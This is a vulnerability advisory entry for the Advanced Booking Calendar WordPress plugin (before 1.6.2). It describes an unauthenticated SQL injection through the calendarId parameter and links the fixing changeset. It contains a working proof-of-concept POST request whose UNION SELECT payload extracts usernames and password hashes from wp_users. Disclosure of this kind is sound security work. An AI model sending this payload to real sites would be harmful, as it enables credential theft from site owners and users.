Advanced Booking Calendar < 1.6.2 – Unauthenticated SQL Injection | Plugin Vulnerabilities

Description

The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Cookie:
cache-control: no-cache

calendarId=1)+UNION+SELECT+1%2Cuser_login%2C3%2C4%2C5%2C6%2C7%2C2%2Cuser_pass+FROM+wp_users+WHERE+ID%3D1+and+ID+IN+(+1+&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult

Affects Plugins

advanced-booking-calendar

Fixed in 1.6.2

References

URL

https://plugins.trac.wordpress.org/changeset/2202805

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lenon Leite

Submitter

Lenon Leite

Submitter twitter

Verified

Yes

WPVDB ID

bac7b590-70de-45b3-bdc2-19f90524ca39

Timeline

Publicly Published

2020-10-22 (about 5 years ago)

Added

2020-10-22 (about 5 years ago)

Last Updated

2020-10-22 (about 5 years ago)

Other

Published

Title

Published

2024-12-24

Title

NEX-Forms < 8.7.16 - Authenticated (Admin+) SQL Injection

Published

2025-05-12

Title

WP-Optimize < 4.2.0 - Admin+ SQLi

Published

2017-06-04

Title

Event List <= 0.7.8 - Authenticated SQL Injection

Published

2014-08-01

Title

store-locator-le - SQL Injection

Published

2023-03-20

Title

Groundhogg Contacts < 2.7.9.4 - Admin+ SQLi